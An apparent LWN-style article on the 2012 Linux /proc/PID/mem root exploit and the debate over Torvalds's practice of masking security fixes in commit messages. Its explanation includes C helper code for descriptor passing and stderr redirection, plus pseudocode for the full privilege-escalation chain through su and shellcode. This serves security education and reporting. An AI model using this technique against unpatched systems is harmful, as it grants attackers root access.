A /proc/PID/mem vulnerability
A privilege escalation in the kernel is always a serious threat, one that leads kernel hackers and distributions to scramble to close the hole quickly. That's exactly what happened after a January 17 report from Jüri Aedla to the closed kernel security mailing list. Most people didn't learn of the hole from Aedla, since he posted to a closed list, but from Jason Donenfeld (aka zx2c4), who posted a detailed look at the flaw on January 22. The fix was made by Linus Torvalds and went into the mainline on January 17, though with a commit message that obfuscated the security implications, something that didn't sit well with some.
The problem and exploit
The problem itself stems from the removal of the restriction on writes to /proc/PID/mem that was merged for the 2.6.39 kernel. It was part of a patch set that was specifically targeted at allowing debuggers to write to the memory of processes easily via the /proc/PID/mem file. Unfortunately, it left open a hole that Aedla and Donenfeld (at least) were able to exploit.
The posting by Donenfeld is worth a read for those interested in how exploits of this sort are created. The problem starts with the fact that the open() call for /proc/PID/mem does no additional checking beyond the normal VFS permissions before returning a file descriptor. That proved to be a mistake, and one that Torvalds's fix remedies. Instead of checking at open() time, the vulnerable code checked in write() and only allowed writing if the process being written to was the same as the process doing the writing (i.e. task == current).
That restriction seems like it would make an exploit difficult, but it can be sidestepped by calling exec() and coercing the newly run program into writing to its own memory. That is dangerous if the newly run program is a setuid executable, for example. But there is another test that is meant to block that particular path: it checks that current->self_exec_id has the same value as it did at open() time. self_exec_id is incremented every time that a process does an exec(), so it will definitely be different after executing the setuid binary. But, since it is simply incremented, one can arrange (via fork()) to have a child process with the same self_exec_id as the main process will have after the setuid exec() is done.
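The counter logic is easier to follow in a toy user-space model. The sketch below is not kernel code: only self_exec_id is a real field name, while the toy_* structures and functions, the PIDs, and the starting counter value of 0 are assumptions made for illustration. It models the two write()-time tests and shows why a plain increment can be matched by a forked child.

```c
/* Toy user-space model of the checks described above. This is NOT kernel
 * code: only self_exec_id is a real field name; the rest is hypothetical. */
struct toy_task {
    int pid;
    unsigned int self_exec_id;    /* incremented on every exec() */
};

struct toy_mem_file {
    int target_pid;               /* process whose memory the file refers to */
    unsigned int exec_id_at_open; /* opener's self_exec_id when it called open() */
};

/* fork(): the child starts with a copy of the parent's counter. */
static struct toy_task toy_fork(const struct toy_task *parent, int child_pid)
{
    struct toy_task child = *parent;
    child.pid = child_pid;
    return child;
}

/* exec(): same PID, counter bumped by one. */
static void toy_exec(struct toy_task *t)
{
    t->self_exec_id++;
}

/* open(): no extra check in this model; just remember the opener's counter. */
static struct toy_mem_file toy_open_mem(const struct toy_task *opener,
                                        int target_pid)
{
    struct toy_mem_file f = { target_pid, opener->self_exec_id };
    return f;
}

/* write(): allowed only if task == current and the counters match. */
static int toy_write_allowed(const struct toy_mem_file *f,
                             const struct toy_task *current)
{
    return f->target_pid == current->pid &&
           f->exec_id_at_open == current->self_exec_id;
}

/* Direct route: open your own mem file, then exec(). The counter moves on,
 * so the write is refused. */
static int toy_direct_route(void)
{
    struct toy_task parent = { 100, 0 };
    struct toy_mem_file f = toy_open_mem(&parent, parent.pid);
    toy_exec(&parent);                        /* parent counter 0 -> 1 */
    return toy_write_allowed(&f, &parent);
}

/* fork() route: a child that has already exec()ed once opens the parent's
 * file, so the recorded counter matches the parent's value after its exec(). */
static int toy_fork_route(void)
{
    struct toy_task parent = { 100, 0 };
    struct toy_task child = toy_fork(&parent, 101);
    toy_exec(&child);                         /* child counter 0 -> 1 */
    struct toy_mem_file f = toy_open_mem(&child, parent.pid);
    toy_exec(&parent);                        /* parent counter 0 -> 1 */
    return toy_write_allowed(&f, &parent);
}
```

In this model toy_direct_route() returns 0 (write refused) and toy_fork_route() returns 1 (write allowed), which is the gap the real exploit walks through.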
The child with the "correct" self_exec_id value (which it gets by doing an exec()) can then open the parent's /proc/PID/mem file (since there are no extra checks on the open()) and pass the descriptor back to the parent via Unix sockets. The parent then needs to arrange that the setuid executable writes to that file descriptor once a seek() to the proper address has been done. Finding that proper address and getting the binary to write to the fd are the final pieces of the puzzle.
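Passing an open descriptor between processes is a standard Unix facility and not specific to this bug. The following is a minimal sketch of it using SCM_RIGHTS ancillary data on a Unix-domain socket. The helper names send_fd() and recv_fd() and their signatures are assumptions for illustration, and the demo passes a harmless pipe descriptor within a single process rather than anything under /proc.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send one open descriptor over a connected Unix-domain socket. */
static int send_fd(int sock, int fd)
{
    char dummy = 'x';                 /* at least one data byte must be sent */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {                           /* union keeps the buffer aligned */
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&msg, 0, sizeof msg);
    memset(&ctrl, 0, sizeof ctrl);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;     /* "this message carries descriptors" */
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof fd);

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor; returns the new fd, or -1 on failure. */
static int recv_fd(int sock)
{
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof fd);
    return fd;
}

/* Demo: pass the write end of a pipe through a socketpair, then check that
 * data written to the received descriptor arrives on the pipe's read end.
 * Returns 0 on success, -1 on failure. */
static int demo_fd_passing(void)
{
    int sv[2], pfd[2], got, ok = -1;
    char buf[2];

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;
    if (pipe(pfd) < 0) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }
    if (send_fd(sv[0], pfd[1]) == 0 && (got = recv_fd(sv[1])) >= 0) {
        if (write(got, "ok", 2) == 2 && read(pfd[0], buf, 2) == 2 &&
            memcmp(buf, "ok", 2) == 0)
            ok = 0;
        close(got);
    }
    close(pfd[0]);
    close(pfd[1]);
    close(sv[0]);
    close(sv[1]);
    return ok;
}
```

The received descriptor refers to the same open file description as the one that was sent, which is why a descriptor opened by one process remains usable in another.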
Donenfeld's example uses su because it is not compiled as a position-independent executable (PIE) for most distributions, which makes it easier to figure out which address to use. He exploits the fact that su prints an error message when it is passed an unknown username and the error message helpfully prints the username passed. That allows the exploit to pass shellcode (i.e. binary machine language that spawns a shell when executed) as the argument to su.
After printing the error message, su calls the exit() function (really exit@plt), which is what Donenfeld's exploit overwrites. It finds the address of the function using objdump, subtracts the length of the error message that gets printed before the argument, and seeks the file to that location. It uses dup2() to connect stderr to the /proc/PID/mem file descriptor and execs su "shellcode".
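The seek arithmetic can be tried safely on an ordinary file. The sketch below is an illustration only: the temporary file, the prefix text, the payload string, and the target offset are all made-up stand-ins, and nothing here touches /proc. It shows that after dup2() the stderr descriptor shares the file offset set by lseek(), so seeking to the target minus the prefix length makes the text that follows the prefix land exactly on the target.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 if the payload landed at the target offset, -1 otherwise. */
static int demo_stderr_redirect(void)
{
    char path[] = "/tmp/stderr-demo-XXXXXX";
    const char *prefix = "unknown id: ";   /* stand-in for the error text */
    const char *payload = "PAYLOAD";       /* stand-in for the argument */
    const size_t plen = strlen(prefix), dlen = strlen(payload);
    const off_t target = 32;               /* arbitrary offset in the file */
    char zeros[64] = { 0 }, got[8] = { 0 };
    int fd, saved, rc = -1;

    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                          /* file vanishes when closed */

    saved = dup(STDERR_FILENO);            /* keep the real stderr */
    if (saved < 0) {
        close(fd);
        return -1;
    }

    if (write(fd, zeros, sizeof zeros) == (ssize_t)sizeof zeros &&
        lseek(fd, target - (off_t)plen, SEEK_SET) >= 0 &&
        dup2(fd, STDERR_FILENO) >= 0) {
        /* fd 2 now shares fd's offset: the prefix is written first, and
         * the payload follows it, starting at the target offset. */
        if (write(STDERR_FILENO, prefix, plen) == (ssize_t)plen &&
            write(STDERR_FILENO, payload, dlen) == (ssize_t)dlen &&
            pread(fd, got, dlen, target) == (ssize_t)dlen &&
            memcmp(got, payload, dlen) == 0)
            rc = 0;
    }

    dup2(saved, STDERR_FILENO);            /* restore the real stderr */
    close(saved);
    close(fd);
    return rc;
}
```

Because dup2() duplicates the descriptor rather than reopening the file, the offset survives into whatever program later writes to stderr, provided the descriptor stays open across the exec().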
In pseudocode, the exploit might look something like this:
    if (!child && fork()) { /* child flag set based on -c */
        /* first program invocation, this is parent, wait for fd from child */
        fd = recv_fd(); /* get the fd from the child */
        dup2(2, 15);
        dup2(fd, 2); /* make fd be stderr */
        lseek(fd, offset); /* offset to overwrite location */
        exec("/bin/su", shellcode); /* will have self_exec_id == 1 */
    }
    else if (!child) {
        /* this is the child from the fork(), exec with child flag */
        exec("thisprog", "-c"); /* this program with -c (child) */
    }
    else {
        /* child after exec, will have self_exec_id == 1 */
        fd = open("/proc/PPID/mem", O_RDWR); /* open parent PID's mem file */
        send_fd(fd); /* send the fd to the parent */
    }
Of course, Aedla's proof-of-concept or Donenfeld's exploit code is likely to be even more instructive.
It's obviously a complicated multi-step process, but it is also a completely reliable way to get root privileges. Updates to Donenfeld's post show exploits for distributions like Fedora that do build su as a PIE, or for Gentoo where the read permissions on setuid binaries have been removed so objdump can't be used to find the address of the exit function. For Fedora, gpasswd can be substituted as it is not built as a PIE, while on Gentoo, ptrace() can be used to find the needed address. While it was believed that address space layout randomization (ASLR) for PIEs would make exploitation much more difficult, that proved to be only a small hurdle, at least on 32-bit systems.
The fix and reactions
The fix hit the mainline without any coordination with Linux distributions. Kees Cook, who works on ChromeOS security (and formerly was a member of the Ubuntu security team), told LWN that Red Hat has a person on the closed kernel security mailing list, so it was aware of the problem but did not share that information on the Linux distribution security list. "I've been told this will change in the future, but I'm worried it will be overlooked again", he said. The first indication that other distributions had was likely from Red Hat's Eugene Teo's request for a CVE on the oss-security mailing list.
As Cook points out, the abrupt public disclosure of the bug (via a mainline commit) runs counter to the policy described in the kernel's Documentation/SecurityBugs file, where the default policy is to leave roughly seven days between reports to the mailing list and public disclosure to allow time for vendors to fix the problem. Cook is concerned that bugs reported to security@kernel.org are not being handled reasonably:
The "just a bug" refers to statements that Torvalds has made over the years about security bugs being no different than any other kind of bug. In email, Torvalds described it this way:
In keeping with that philosophy, Torvalds does not disclose the security relevance of a fix in the commit message: "I think the whole 'mark this patch as having security implications' is pure and utter garbage". Even if there is a known security problem that is being fixed, his commit messages do not reflect that, as with the message for the /proc/PID/mem fix:
This changes it to do the permission checks at open time, and instead of tracking the process, it tracks the VM at the time of the open. That simplifies the code a lot, but does mean that if you hold the file descriptor open over an execve(), you'll continue to read from the _old_ VM.
Torvalds's commit message stands in pretty stark contrast to Aedla's report to security@kernel.org (linked above):
This "masking" of the actual reason for a commit doesn't sit well with either Cook or Teo (who also responded to an email query). Cook "cannot overstate how much I am against this kind of masking", while Teo pointed out that this particular bug is in no way unique:
Both Teo and Cook were in agreement that disclosing what is known about a fix at the time it is applied can only help distributions and others trying to track kernel development. Torvalds, on the other hand, is concerned about attackers reading commit messages, which could lead to more attacks against Linux systems. He has a well-known contempt for security "clowns" that seems to also factor into his reasoning:
Both the security camps hate me. The full disclosure people think I try to hide things (which is true), while the embargo people think I despise their corrupt arses (which is also true).
The strange thing is that by explicitly not putting the known security implications of a patch into the commit message, Torvalds is treating security bugs differently. They are no longer "just bugs" because some of the details of the bug are being purposely omitted. That may make it difficult for "black hats"—though it would be somewhat surprising if it did—but it definitely makes it more difficult for those who are trying to keep Linux users secure. Worse yet, it makes it more difficult down the road when someone is looking at a commit (or reversion) in isolation because they may miss out on some important context.
Silent security fixes are a hallmark of proprietary software, and Torvalds's policy resembles that to some extent. It could be argued (and presumably would be by Torvalds and others) that the fixes aren't silent since they go into a public repository and that is true—as far as it goes. By deliberately omitting important information about the bug, which is not done for most or all other bugs, perhaps they aren't so much silent as they are "muted" or, sadly, "covered up". There is definitely a lot of validity to Torvalds's complaints about the security "circus", but his reaction to that circus may not be in the best interests of the kernel community either.